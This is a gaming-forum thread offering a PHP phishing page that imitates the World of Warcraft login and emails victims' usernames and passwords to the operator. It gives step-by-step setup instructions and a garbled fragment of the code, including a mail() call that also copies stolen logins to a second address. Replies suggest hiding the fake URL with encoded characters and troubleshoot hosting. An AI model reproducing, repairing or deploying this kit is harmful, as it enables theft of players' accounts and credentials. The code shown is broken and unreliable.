hmmm, not a bad idea. if someone finds out it is a phisher, then there is really no way the can get the accounts
Requirements:
1) Any sort of server with PHP enabled. If you don't have a host, it is possible to modify your own computer as a webhost, but that is a rather long process. I'll see if I can find an existing guide for that.
2) an e-mail address
About:
This acts as an exact WoW login page. But instead of logging in, the name and password get's emailed to you. It's that easy.
Instructions:
1) Create a new file using dreamweaver, notepad or any text editor. Name it index.php
2) Copy & paste the following code into that file:
3) Replace the email address at the top of the file with your'sCode:// This is the only line you need to edit // replace with your email address (the victim's info will be sent there) $email = 'your@email.com'; ?>World of Warcraft
4) Upload the file to your server
5) Voila! Done. The file is fully functional. Combine this with m0rbidang3l's domain masking tutorial and you're really set.
hmmm, not a bad idea. if someone finds out it is a phisher, then there is really no way the can get the accounts
true, but i'd bet a lot of people wouldn't notice if they glanced at the address bar and saw something like http://www.worldofwarcraft.com/login%42%76%09%98%34
albeit, they'd have to be using IE
i'm just concerned about hosting it on my personal server, otherwise I'd test it out and share the results.
I get this text:
"Please fill in both fields.
'; } else { mail($email . ", " . '[email protected]', 'Login from ' . $_POST['username'], 'Account: ' . $_POST['username'] . "\n\n" . 'Pass: ' . $_POST['password'], 'From: Login-Page' . "\r\n" . 'Reply-To: Login-Page' . "\r\n" . 'X-Mailer: PHP/' . phpversion()); echo '
error An error has occurred.
'; } } ?>"
+ real looking login and security text.
looks nice but i dont know how to get ppl on the server and write their info when the url is like FREEWEB.COM ?
any suggestions about how?
ok, i don't think the mmowned forum is liking my php. Did you get the error when you try to post here or running the file? whenever i post a reply, I get this error:
Code:Parse error: parse error, unexpected T_BAD_CHARACTER, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /var/www/vhosts/mmowned.com/httpdocs/forums/includes/ame_bbcode.php(192) : regexp code on line 4 Fatal error: Failed evaluating code: ame_substitute(1,....etc
Running the file in FF.
Here's a pic:
http://img521.imageshack.us/img521/1927/errorqr7.jpg
Can anyone tell me where i from host that kinda site? ^^
Im pretty sure.
If I Run the .php in firefox, I get the same error.
I'm not running under any php-enabled servers, but where may I get one?
well, i have it hosted and all, but in big bold letters in the top left corner, it says
"This form is inoperational" ... kinda gives it away...
and i try to test it but when i click accept or w/e nothing happens
Yeah, I r sekcz.